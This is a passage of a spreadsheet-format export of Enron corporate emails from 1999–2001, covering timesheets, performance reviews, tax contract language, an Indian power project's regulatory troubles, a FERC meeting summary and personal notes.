we send them an automatic reminder via email.  It would also be good to have_x000D_
each person's phone number, in the event we need to reach them._x000D_
_x000D_
So, we do need to receive that complete TS Excel spreadsheet, or if you need_x000D_
to instead, provide the needed information via email._x000D_
_x000D_
Thank you for your assistance Phillip._x000D_
_x000D_
Christi L. Smith_x000D_
Project Manager for Client Services_x000D_
Keilty, Goldsmith &amp; Company_x000D_
858/450-2554_x000D_
_x000D_
-----Original Message-----_x000D_
From: Phillip K Allen [mailto:Phillip.K.Allen@enron.com]_x000D_
Sent: Thursday, August 31, 2000 12:03 PM_x000D_
To: debe@fsddatasvc.com_x000D_
Subject:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Lavorato-M_x000D_
_x000D_
Mike Grigsby-D_x000D_
Keith Holst-D_x000D_
Frank Ermis-D_x000D_
Steve South-D_x000D_
Janie Tholt-D_x000D_
_x000D_
Scott Neal-P_x000D_
Hunter Shively-P_x000D_
Tom Martin-P_x000D_
John Arnold-P_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 07:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>talking points</t>
  </si>
  <si>
    <t xml:space="preserve">just a couple of minor changes - what is the last sentence about?_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 May 2000 02:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Ehud,_x000D_
_x000D_
Sorry I shall miss you on Thursday._x000D_
_x000D_
I shall definitely attend you presentation at Power 2000._x000D_
_x000D_
I shall ask about a guest accounton EOL. Typically, such an account allows_x000D_
an outside user to take a look at the system, but I don't think the traders _x000D_
will allow_x000D_
systematic access to the price data over a long period of time by a third _x000D_
party._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Ehud I. Ronn" &lt;eronn@mail.utexas.edu&gt; on 05/01/2000 05:54:50 PM_x000D_
To: Vince.J.Kaminski@enron.com_x000D_
cc:  _x000D_
Subject: 1. Your Thur./Fri. Austin Trip; 2. Presentation of My _x000D_
Risk-Management Optimization Model; 3. Enron On-Line_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
Greetings._x000D_
_x000D_
I am following up at this time with respect to the above issues we_x000D_
discussed in San Antonio._x000D_
_x000D_
1.  I am leaving Thur. morn for Philadelphia, and shall not be back until_x000D_
late Fri.  (My ETD is 9:40 a.m., which I understand is less than an hour_x000D_
before your arrival ...)  Thus I shall regrettably miss your current UT_x000D_
visit, which we had hoped to also use as an opportunity to present/discuss_x000D_
my enterprise-wide risk management model._x000D_
_x000D_
2.  That said, I shall be presenting an abridged version of this model at_x000D_
Power 2000's first day, 5/9 4:15 - 4:55 p.m.  While I realize you'll be_x000D_
very busy over Power 2000's two days, should your schedule permit, I should_x000D_
most welcome the opportunity for you to see the model._x000D_
_x000D_
3.  Per your suggestion in San Antonio, I would like to take this_x000D_
opportunity to inquire whether I might obtain an Enron On-Line account to_x000D_
obtain electricity prices quoted by Enron._x000D_
_x000D_
I look forward to seeing you at Power 2000.  Best Regards,_x000D_
Ehud_x000D_
_x000D_
==============================================_x000D_
     Ehud I. Ronn_x000D_
     Department of Finance_x000D_
     College and Graduate School of Business_x000D_
     University of Texas at Austin_x000D_
     Austin, TX. 78712-1179_x000D_
     Voice:  (512) 471-5853_x000D_
      FAX:   (512) 471-5073_x000D_
      Internet:  eronn@mail.utexas.edu_x000D_
=================================================_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 04:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Tonto (a.k.a - the trusty, but silent, side-kick to the Lone Ranger or in _x000D_
this case the Big D)_x000D_
_x000D_
The play was very good and I think well received.  I'd forgotten how blown _x000D_
away I was by some of the songs the first time I saw it in NY.  The cast _x000D_
members really have to have incredibly powerful voices to pull off a few of _x000D_
the most poignant numbers ( I think this could be your true calling).  I _x000D_
caught the third day of Corey's Jeopardy run last night here at the office _x000D_
(yes, I had to come back after the play...I love my job!).  Anyway, I'm sure _x000D_
I'd mentioned it before but yes she is a very smart girl.  As a result of _x000D_
that, she has managed on several occasions over the years to detract from my _x000D_
enjoyment of playing Trivial Pursuit or watching Jeopardy by absolutely _x000D_
obliterating me (The girl actually did her senior thesis on Trivia).  _x000D_
_x000D_
Kori told me she saw you last night at Steak Night and introduced herself _x000D_
since I failed to do so the last time we went.  I should let you know though _x000D_
that she was very offended this morning that you didn't spell her name right _x000D_
in the email - I mean it's such a common spelling.  So was Darren there last _x000D_
night to meet her or do you just think they'd make a good match?  She's a _x000D_
very fun girl.  _x000D_
_x000D_
Hope you day is going well and that the move to 30 went off without a hitch.  _x000D_
Good luck with all of the "fun" meetings._x000D_
_x000D_
Shorty_x000D_
_x000D_
-- Due to the lack of response yesterday, I'm beginning to worry about your _x000D_
success with the road test...I'm going to assume that you didn't get around _x000D_
to it._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ted Noble_x000D_
08/17/2000 10:05 AM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
How was the play?  I forgot to tell you that I saw your friend on a re-run _x000D_
Jeopardy the other night and I almost called you but it came on at 11:30.  _x000D_
Smart girl.  I ran into Corey last night at LWs and I am thinking this is a _x000D_
girl for Darren.  Anyway, lots of fun meetings today.  I'll talk to you later._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 04:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carol.short@enron.com'})</t>
  </si>
  <si>
    <t>Re: Year End PRC Review</t>
  </si>
  <si>
    <t xml:space="preserve">Company:  Enron Americas_x000D_
Department: Risk Management_x000D_
Supervisor:  Jeffery Gossett 3-7306_x000D_
_x000D_
Thanks,_x000D_
Robin_x000D_
x57478_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carol Short@ENRON_DEVELOPMENT_x000D_
11/13/2000 10:58 AM_x000D_
To: Timothy Blanchard@ees, J. Christopher Champion@ECT, Tyrell Harrison@ECT, _x000D_
Steve Hirsh/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Crystal Hyde@ECT, John _x000D_
Lang/NA/Enron@Enron, Robin Rodrigue@ECT, Eric Scott@EES, Henry _x000D_
Montana/HOU/EES@EES, Eric H Mason/Corp/Enron@Enron, Micah Hatten/HOU/EES@EES, _x000D_
Niclas Egmar/HOU/EES@EES, Ted Huang@ENRON COMMUNICATIONS_x000D_
cc:  _x000D_
Subject: Year End PRC Review_x000D_
_x000D_
Well, it's that time again - _x000D_
_x000D_
Mike Norris will again be representing each of you during this joyous time.  _x000D_
To make sure we have up-to-date information, would you please email your _x000D_
current company, department, supervisor and supervisor's phone number.  _x000D_
_x000D_
Please let me have this information as quickly as possible._x000D_
_x000D_
Thanks._x000D_
_x000D_
Carol_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 03:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edward.baughman@enron.com'})</t>
  </si>
  <si>
    <t>Re: Tax issues</t>
  </si>
  <si>
    <t xml:space="preserve">Matt and Patrick:_x000D_
We're not sure exactly what tax exposures you're concerned about, but I'm _x000D_
sending you the attached language, which was approved by Tax Dept. earlier _x000D_
this year for use w/ EEI Master Agreements.  We since decided, with Tax Dept. _x000D_
approval, to go w/ the shorter standard language in the EEI Master, adding _x000D_
this language only to longer term deals (&gt; one year).   Does the attached _x000D_
language go far enough to address your concerns with the industrials?  Please _x000D_
advise._x000D_
_x000D_
Regards,_x000D_
Janice_x000D_
_x000D_
EB3861_x000D_
Assistant General Counsel, Enron North America Corp._x000D_
713-853-1794 (Fax:  713-646-4842)_x000D_
_x000D_
_x000D_
_x000D_
	Edward D Baughman_x000D_
	11/07/2000 12:02 PM_x000D_
		 _x000D_
		 To: Elizabeth Sager/HOU/ECT@ECT, David Portz/HOU/ECT@ECT, Janice R _x000D_
Moore/HOU/ECT@ECT, Kim S Theriot/HOU/ECT@ECT_x000D_
		 cc: Patrick Maloy/HOU/ECT@ECT, Matthew F Gockerman/HOU/ECT@ECT_x000D_
		 Subject: _x000D_
_x000D_
ENA East Power will be making an aggressive push to build industrial market _x000D_
share in open access states in 2001. Pat Maloy and Matt Gockerman_x000D_
in Enron's  tax dept. have voiced concern over potential exposure to: 1. _x000D_
sales &amp; use tax, 2. gross receipts tax. Two primary questions I have are:_x000D_
_x000D_
 1. Legal: Can we craft standard language that pushes all tax consequences _x000D_
onto the industrial ?_x000D_
 2. Do we need to alter the deal documentation mechanics (i.e., Enpower) to _x000D_
adjust for this issue?_x000D_
_x000D_
I request that Elizabeth Sager and Kim Theriot advise me on this issue._x000D_
_x000D_
Thanks,   Ed_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 08:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bruce.lundstrom@enron.com', 'rob.walls@enron.com'})</t>
  </si>
  <si>
    <t>FW: Developments</t>
  </si>
  <si>
    <t xml:space="preserve"> FYI.  Please call me if you would like any additional information.  Thanks. _x000D_
 -----Original Message-----_x000D_
From:  Katwala, Sandeep  _x000D_
Sent: Monday, March 12, 2001 12:53 AM_x000D_
To: Brownfeld, Gail; cwalker@linklaters.com; kelly.quinn@linklaters.com_x000D_
Subject: Developments_x000D_
_x000D_
Thought you ought to be aware of the following._x000D_
_x000D_
1. Maharashtra Pollution Control Board_x000D_
DPC received a letter from MPCB asking it to cease generation until a Consent _x000D_
to Operate is obtained. Kraske and his team are dealing with this. We have _x000D_
heard that MPCB is likely to make a further visit to the site today to "dig _x000D_
up the drains" and clearly the water pollution issue could arise as part f _x000D_
that visit. The visit is rumoured and may not be fact as yet. Suhas has asked _x000D_
Atul R to start working on a petition re the ceasing of generation issue. My _x000D_
read of this is that the original approval given by MPCB clearly contemplates _x000D_
that DPC is allowed to generate electricity while it is testing without a _x000D_
Consent to Operate; it can do so under its Consent to Establish which was _x000D_
given prior to financial close. MPCB disagreed at the time of the testing of _x000D_
Phase I but seemed to have conceded the point eventually and DPC did test _x000D_
before obtaining the Consent to Operate. This time DPC wrote to MPCB and told _x000D_
them that it was going to test. MPCB wrote back and said that it should not _x000D_
do so until a Consent to Operate had been obtained. DPC seems to have ignored _x000D_
that instruction from MPCB and proceeded to test and export power to MSEB. _x000D_
MPCB then visited the site and discovered that testing was going on and that _x000D_
evening sent a letter to DPC asking it to stop generating. DPC may have to _x000D_
file a writ petition on the generation issue - a meeting has been requested _x000D_
with MPCB but has been declined._x000D_
On the rumoured site visit it seems that MPCB will turn up in force and no _x000D_
doubt will find a number of things however minor. _x000D_
My instinct is that this will end up in litigation in some form or other but _x000D_
that it is going ot get very nasty. The Chief Minister is reported to have _x000D_
gone on the offensive as far as the pollution issues are concerned._x000D_
_x000D_
2. Nagpur Petition_x000D_
You will have read in the clippings that a GC Singh has filed a public _x000D_
interest petition in the Nagpur High Court. I am trying to get hold of the _x000D_
petition. DPC was apparently not a corespondent but the Court seems to have _x000D_
issued a notice to DPC (which has not been received by DPC as yet) requesting _x000D_
it to show cause as to why the petition should not be admitted. Atul R has _x000D_
said that there may be a possiblity of knocking this out of the Nagpur Court _x000D_
on the basis that that Court does not have jurisdiction over a matter which _x000D_
has at its root a project in the Ratnagiri district which district does not _x000D_
fall within the list fo areas that can be covered by the Nagpur Court. Atul R _x000D_
is confirming this with Atul S. The Court seems to have given a time limit of _x000D_
6 weeks in which DPC is required to send in an affidavit although some _x000D_
reports in the press say that (i) the petition has been admitted and (ii) _x000D_
that there is a hearing in 7 days time. Atul R's sense is that the petition _x000D_
has not been admitted and that we have a 6 week period. More will be revealed _x000D_
when we get a copy of the petition which hopefully is today. Press reports _x000D_
indicate that the petition alleges the usual bag of things. _x000D_
_x000D_
3. Invoices_x000D_
Can Chris/Kelly please let me know if they have copies of the January and _x000D_
February invoices. On the declaration issue you ought to know that DPC has _x000D_
agreed a deal with MSEB whereby DPC waives the requirement of MSEB to _x000D_
dispatch a minimum of 180MW and instead DPC will supply Block B testing power _x000D_
instead of Block A power. Testing power is, under the PPA, to be paid for by _x000D_
way of a Commissioning Fee (basically fuel costs) which is payable once the _x000D_
Block has entered into ECS. The deal (recorded in letter agreements) is that _x000D_
in return for MSEB taking the testing power and not beong obliged to take the _x000D_
minimum of 180MW it will pay the Commissioning Fee monthly instead of at the _x000D_
end of the testing period. [I think that this has a negative impact on the _x000D_
MPCB generation issue as DPC is receiving income from the sale of power _x000D_
(albeit small) before it has a Consent to Operate - but I am not aware of the _x000D_
full facts and this may be wrong]_x000D_
_x000D_
Sandeep</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 09:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.davis@enron.com', 'marilyn.colbert@enron.com', 'janie.aguayo@enron.com', 'nidia.mendoza@enron.com', 'melissa.murphy@enron.com', 'brent.hendry@enron.com', 'william.bradford@enron.com', 'amber.ebow@enron.com', 'lisa.lees@enron.com', 'tanya.rohauer@enron.com', 'susan.bailey@enron.com', 'mary.gosnell@enron.com', 'gordon.heaney@enron.com', 'wendi.lebrocq@enron.com', 'russell.diamond@enron.com', 'scott.tackett@enron.com', 'mary.solmonson@enron.com', 'brant.reves@enron.com', 'jason.williams@enron.com', 'diane.ellstrom@enron.com', 'laurel.adams@enron.com', 'andrea.guillen@enron.com', 'larry.hunter@enron.com', 'dale.neuner@enron.com', 'bridgette.anderson@enron.com', 'dianne.seib@enron.com', 'tom.moran@enron.com', 'edward.sacks@enron.com', 'mark.taylor@enron.com', 'carrie.southard@enron.com', 'celeste.cisneros@enron.com', 'mary.tudon@enron.com', 'anthony.campos@enron.com', 'adnan.patel@enron.com', 'bill.hare@enron.com', 'bradley.diebner@enron.com', 'sara.shackleton@enron.com', 'diane.anderson@enron.com', 'lesli.campbell@enron.com', 'jason.moore@enron.com', 'debbie.brackett@enron.com', 'samuel.schott@enron.com', 'lynn.shivers@enron.com', 'veronica.espinoza@enron.com', 'tana.jones@enron.com', 'tracy.ngo@enron.com', 'karen.lambert@enron.com', 'stacey.richardson@enron.com', 'carol.clair@enron.com', 'paul.radous@enron.com', 'robert.bruce@enron.com', 'leslie.reeves@enron.com', 'derek.bailey@enron.com', 'samantha.boyd@enron.com', 'jarrod.cyprow@enron.com', 'mary.cook@enron.com', 'kevin.meredith@enron.com', 'bob.bowen@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>Home-Stake Oil &amp; Gas Company</t>
  </si>
  <si>
    <t>We have received an executed Master Agreement:_x000D_
_x000D_
Type of Contract:  ISDA Master Agreement (Multicurrency-Cross Border)_x000D_
_x000D_
Effective Date:   September 20, 2000_x000D_
_x000D_
Enron Entity:   Enron North America Corp._x000D_
_x000D_
Counterparty:   Home-Stake Oil &amp; Gas Company_x000D_
_x000D_
Transactions Covered:  Approved for all products with the exception of :  _x000D_
Foreign Exchange_x000D_
_x000D_
Confirming Entity:  Enron North America Corp._x000D_
_x000D_
Copies will be distributed._x000D_
_x000D_
Stephanie</t>
  </si>
  <si>
    <t>Fri, 28 Sep 2001 11:47:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jhunt@nicor.com'})</t>
  </si>
  <si>
    <t>Master Draft</t>
  </si>
  <si>
    <t xml:space="preserve">As discussed, please see the attached. _x000D_
_x000D_
_x000D_
  _x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Jan 2001 03:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alan.comnes@enron.com', 'tim.belden@enron.com'})</t>
  </si>
  <si>
    <t>Chairman Hoecker Tenders Resignation Effective Jan. 18</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 01/10/2001 09:11 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Shelley Corman@ENRON_x000D_
01/10/2001 07:54 AM_x000D_
To: Nancy Bagot/OTS/Enron@ENRON, John Ballentine/FGT/Enron@ENRON, Theresa _x000D_
Branney/ET&amp;S/Enron@Enron, Martha Benner/ET&amp;S/Enron, Eric _x000D_
Benson/NA/Enron@ENRON, Donna Bily/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lynn _x000D_
Blair/ET&amp;S/Enron@ENRON, Jack Boatman/FGT/Enron@ENRON, Rob _x000D_
Bradley/Corp/Enron@ENRON, Bob Chandler/ET&amp;S/Enron@ENRON, Bill _x000D_
Cordes/NPNG/Enron@ENRON, Shelley Corman/ET&amp;S/Enron@ENRON, Christi _x000D_
Culwell/FGT/Enron@ENRON, Mary Darveaux/ET&amp;S/Enron@ENRON, Rick _x000D_
Dietz/ET&amp;S/Enron@ENRON, Dari Dornan/ET&amp;S/Enron@ENRON, John _x000D_
Dushinske/ET&amp;S/Enron@ENRON, Sharon Farrell/FGT/Enron@ENRON, Drew _x000D_
Fossum/ET&amp;S/Enron@ENRON, John Goodpasture/OTS/Enron@ENRON, Mary _x000D_
Hain/HOU/ECT@ECT, Steven Harris/ET&amp;S/Enron@ENRON, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Glen Hass/ET&amp;S/Enron@ENRON, Robert _x000D_
Hayes/FGT/Enron@ENRON, Rod Hayslett/FGT/Enron@ENRON, Bambi _x000D_
Heckerman/NPNG/Enron@ENRON, Theresa Hess/ET&amp;S/Enron, Robert _x000D_
Hill/NPNG/Enron@ENRON, Staci Holtzman/FGT/Enron@ENRON, Tamara _x000D_
Hopkins/ET&amp;S/Enron@ENRON, Stanley Horton/Corp/Enron@Enron, Steve _x000D_
Hotte/Corp/Enron@ENRON, Lee Huber/ET&amp;S/Enron@ENRON, Martha _x000D_
Janousek/ET&amp;S/Enron@ENRON, Steven January/ET&amp;S/Enron@ENRON, Beth _x000D_
Jensen/NPNG/Enron@ENRON, Anne Jolibois/FGT/Enron@ENRON, Steven J _x000D_
Kean/NA/Enron@Enron, Jeffrey Keeler/Corp/Enron@ENRON, Robert _x000D_
Kilmer/FGT/Enron@ENRON, Frazier King/FGT/Enron@ENRON, Steve _x000D_
Kirk/ET&amp;S/Enron@ENRON, Tim Kissner/ET&amp;S/Enron@ENRON, Laura _x000D_
Lantefield/ET&amp;S/Enron@ENRON, Linda L Lawrence/NA/Enron@Enron, Blair _x000D_
Lichtenwalter/FGT/Enron@ENRON, Elizabeth Linnell/NA/Enron@Enron, Teb _x000D_
Lokey/FGT/Enron@ENRON, Phil Lowry/OTS/Enron@ENRON, Susan J _x000D_
Mara/NA/Enron@ENRON, Donna Martens/ET&amp;S/Enron@ENRON, Dorothy _x000D_
McCoppin/FGT/Enron@ENRON, Mike McGowan/ET&amp;S/Enron@ENRON, Rockford _x000D_
Meyer/FGT/Enron@ENRON, Mary Kay Miller/ET&amp;S/Enron@ENRON, Michael _x000D_
Moran/ET&amp;S/Enron@ENRON, Sheila Nacey/ET&amp;S/Enron@ENRON, Michel _x000D_
Nelson/ET&amp;S/Enron@ENRON, Ray Neppl/NPNG/Enron@ENRON, Robert _x000D_
Neustaedter/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Christi L _x000D_
Nicolay/HOU/ECT@ECT, Sarah Novosel/Corp/Enron@ENRON, Ranelle _x000D_
Paladino/ET&amp;S/Enron@Enron, Zelda Paschal/FGT/Enron@ENRON, Geneva _x000D_
Patterson/NPNG/Enron@ENRON, Maria Pavlou/ET&amp;S/Enron, Eileen _x000D_
Peebles/ET&amp;S/Enron@ENRON, Keith Petersen/ET&amp;S/Enron@ENRON, Peggy _x000D_
Phillips/FGT/Enron@ENRON, Janet Place/NPNG/Enron@ENRON, Tony _x000D_
Pryor/ET&amp;S/Enron@ENRON, Colleen Raker/ET&amp;S/Enron@ENRON, Kathy _x000D_
Ringblom/ET&amp;S/Enron@Enron, Cynthia Sandherr/Corp/Enron@ENRON, James _x000D_
Saunders/FGT/Enron@ENRON, Dave Schafer/NA/Enron@ENRON, Donna _x000D_
Scott/FGT/Enron@ENRON, Susan Scott/ET&amp;S/Enron@ENRON, Richard _x000D_
Shapiro/NA/Enron@Enron, Mike G Smith/NA/Enron@Enron, Louis _x000D_
Soldano/ET&amp;S/Enron@ENRON, Lon Stanton/ET&amp;S/Enron@ENRON, James D _x000D_
Steffes/NA/Enron@Enron, James Studebaker/FGT/Enron@ENRON, Jim _x000D_
Talcott/ET&amp;S/Enron, Gina Taylor/OTS/Enron@Enron, Debbie _x000D_
Thompson/FGT/Enron@ENRON, Denis Tu/FGT/Enron@ENRON, Michael Van _x000D_
Norden/Corp/Enron@ENRON, Stephen Veatch/FGT/Enron@ENRON, Donald _x000D_
Vignaroli/ET&amp;S/Enron@ENRON, Jody Warner/NPNG/Enron@ENRON, Kimberly _x000D_
Watson/ET&amp;S/Enron@ENRON, Julia White/ET&amp;S/Enron@ENRON, Kim _x000D_
Wilkie/ET&amp;S/Enron@ENRON, Jane Wilson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Michele Winckowski/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Chairman Hoecker Tenders Resignation Effective Jan. 18_x000D_
_x000D_
At the FERC Commission meeting this morning, Chairman Hoecker announced his _x000D_
resignation from the Commission effective January 18.  _x000D_
_x000D_
Other Items at the Meeting:_x000D_
Hoecker summarized the meetings that occurred last night with Cal. Gov. _x000D_
Davis, Energy Sec. Richardson, Clinton Administration officials and industry _x000D_
representatives.  He said that the parties had produced a statement of _x000D_
principles on resolving the Calif. issues.  Specifically, he mentioned that _x000D_
the principles include a discussion of the regional nature of the market._x000D_
Order on GridFlorida.   When GridFlorida made its RTO filing, they asked the _x000D_
Commission for an expedited order providing guidance on certain independence _x000D_
and governance matters.  This order provides guidance on:_x000D_
The process for selecting the RTO board_x000D_
The process for selecting a CEO and directors_x000D_
Rules for financial holdings by RTO board members._x000D_
Items Struck form Agenda:  The Commission did not act on Illinois Power's _x000D_
requests to leave the Midwest ISO or the Alliance second RTO  filing.  _x000D_
Commissioner Massey criticized the Commission for being slow to act on these _x000D_
items.  He said that at the heart of both of these filings is the issue of _x000D_
scope/configuration of RTOs.   He shared his belief that the Midwest must be _x000D_
treated on a regional basis._x000D_
El Paso v. CPUC complaint.  This proceeding involves CPUC's complaint that _x000D_
affiliate El Paso Merchant is improperly hoarding El Paso Natural Gas _x000D_
capacity to California.   The Commission did not discuss the draft order.  _x000D_
However, Hebert noted that he had dissented from the order.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 08:21:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: metals RAC member</t>
  </si>
  <si>
    <t>fyi thoughts? rick_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Apollo, Beth  _x000D_
Sent:	Thursday, October 25, 2001 10:07 AM_x000D_
To:	Buy, Rick_x000D_
Subject:	FW: metals RAC member_x000D_
_x000D_
I know you guys are all very busy right now, but we are trying to move forward on the Doorstep activities._x000D_
_x000D_
Last I heard you and Rick Causey definitely wanted us to do the London ones._x000D_
_x000D_
Any help you can provide in terms of finding a RAC resource to help on this on  would be appreciated._x000D_
_x000D_
Beth_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Wilson, Shona  _x000D_
Sent:	Wednesday, October 24, 2001 8:37 AM_x000D_
To:	Murphy, Ted_x000D_
Cc:	Apollo, Beth_x000D_
Subject:	metals RAC member_x000D_
_x000D_
Dear Ted,_x000D_
_x000D_
We are all set for the metals doorstep to be performed the week of Nov. 5th with the exception of a name for the RAC resource.  We are starting to plan the review and would like to involve RAC.  Who have you designated as the RAC resource (Brenda Herod from Operations will be the person responsible from the operations side)?  _x000D_
_x000D_
I'd like to get Brenda and RAC together some time this week if possible._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Shona _x000D_
X39123</t>
  </si>
  <si>
    <t>Tue, 17 Aug 1999 09:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: earthquake---are you all right?</t>
  </si>
  <si>
    <t>Jeff,_x000D_
_x000D_
Great to hear from you.  Things still fine in my vacinity.  Surkan and_x000D_
family ok, though of course everyone is afraid, worried and sad.  The big_x000D_
picture is not good.  Looks like the death toll alone will reach several_x000D_
thousand, the injured over ten thousand._x000D_
_x000D_
Power and water back on in most of area in my area, and I believe that is_x000D_
true throughout city.  Just looking at an amazing chart on TV that shows an_x000D_
incredible series of some one or two dozen aftershocks, all over 4.O.  The_x000D_
original one was, according to CNN, 7.8.  Some of the other scenes on the_x000D_
tube are hard to believe.  I trust you'll get to see a selection of them_x000D_
back there._x000D_
_x000D_
Thanks for the offer of help.  Don't think this disaster will be borne by_x000D_
everyone, though, as it seems food, drink and everyting else available to_x000D_
all but those who died.  Still, its hard not to imagine that something this_x000D_
big in a place who's resources were already stretched won't result in some_x000D_
serious widespread problems.  So I'll keep you in touch._x000D_
_x000D_
Have been composing a note to you in my head, which I will do by hand soon_x000D_
and send to you with some pictures of your visit here.  Briefly, though, it_x000D_
was great to see you and I am very happy that you've seen a bit about my_x000D_
life here.  Enjoyed seeing Kristin and hope she had fun.  Look forward to_x000D_
seeing her and the other kids soon and meeting Rebecca some day._x000D_
_x000D_
Say hey to all, take care and write again soon._x000D_
_x000D_
Love,_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
&gt;From: "Jeff Skilling" &lt;Jeff_Skilling@enron.com&gt;_x000D_
&gt;To: "Mark Skilling" &lt;markskilling@hotmail.com&gt;_x000D_
&gt;Subject: Re: earthquake---are you all right?_x000D_
&gt;Date: Tue, 17 Aug 1999 09:54:31 -0500_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Mark,_x000D_
&gt;I woke up this morning to a phone call from Rebecca saying that she had_x000D_
&gt;just_x000D_
&gt;seen the reports on CNN.  Luckily I checked phone mail and I had a message_x000D_
&gt;from_x000D_
&gt;Sherri saying that she had already gotten your first message saying that_x000D_
&gt;everything was alright.  Lucky, lucky, lucky!  Let me know if you need_x000D_
&gt;anything._x000D_
&gt;I have already gotten a report from our plant in Marmara saying that_x000D_
&gt;everything_x000D_
&gt;there is O.K.  They had no problem with the facility so they think that_x000D_
&gt;they can_x000D_
&gt;be generating electricity as soon as the grid stabilizes.  No word on when_x000D_
&gt;that_x000D_
&gt;will happen, but it sounds like it won't be too long._x000D_
&gt;_x000D_
&gt;I haven't heard too many reports on the damage, but from your notes it_x000D_
&gt;sounds_x000D_
&gt;like Istanbul came out O.K.  Have you heard from Sukran?  How is her_x000D_
&gt;family?_x000D_
&gt;When you know  drop a note._x000D_
&gt;_x000D_
&gt;I expect that it will be a while before we hear anything else since your_x000D_
&gt;battery_x000D_
&gt;is out, so until then, take care.  Again, if there is anything you need,_x000D_
&gt;let me_x000D_
&gt;know. I imagine that we will be sending supplies over to the plant so I_x000D_
&gt;might be_x000D_
&gt;able to get something to you relatively quickly.  Till then, take care_x000D_
&gt;_x000D_
&gt;Jeff_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_______________________________________________________x000D_
Get Your Private, Free Email at http://www.hotmail.com</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 08:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Thursday</t>
  </si>
  <si>
    <t xml:space="preserve">Breakfast at 10:00 sounds great!  Wherever you want to go...also, I need to _x000D_
get my bike back from you, I might be doing some biking.  I've been thinking _x000D_
about you.  Hope all is going well._x000D_
_x000D_
_x000D_
_x000D_
	"Patti Young" &lt;pyoung@cliverunnells.com&gt;_x000D_
	05/17/2001 05:33 PM_x000D_
		 _x000D_
		 To: "Tana Jones" &lt;tana.jones@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Thursday_x000D_
_x000D_
_x000D_
Miss Tana,_x000D_
_x000D_
Is there a chance you might like to try to get together this weekend?  I_x000D_
thought I would check with you first and then see if Phyllis is available._x000D_
_x000D_
I have a hair appointment at 8 a.m. on Saturday.  We could do breakfast at_x000D_
10, or whatever..._x000D_
_x000D_
Let me know._x000D_
_x000D_
Patti_x000D_
_x000D_
(_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 15:12:34 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: FW: Northern Border Partners Common Units</t>
  </si>
  <si>
    <t>The 10Q describes Rawhide - although it does not list investments, it does reference domestic and international assets.  I assume we can use the same disclosure as is shown in the Q.  When you get back, we can talk more about it.  Any time constraint on this (other than the obvious need for cash)? I hope Jerry hasn't mandated anyone just yet (especially Citi/Solly)._x000D_
_x000D_
-----Original Message-----_x000D_
From: Hayslett, Rod _x000D_
Sent: Monday, November 19, 2001 5:03 PM_x000D_
To: Howard, Kevin A.; Mckean, George_x000D_
Subject: RE: FW: Northern Border Partners Common Units_x000D_
_x000D_
_x000D_
The issue is that in order to sell the units there is a public disclosure of the units being in rawhide which may have some more issues.  A 13d filing is required.  If we want to sell then we need to file and wait._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 09:28:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.schwarzbach@enron.com', 'e..lindsey@enron.com', 'e..sommers@enron.com'})</t>
  </si>
  <si>
    <t>RE: EGAS 4th Qtr</t>
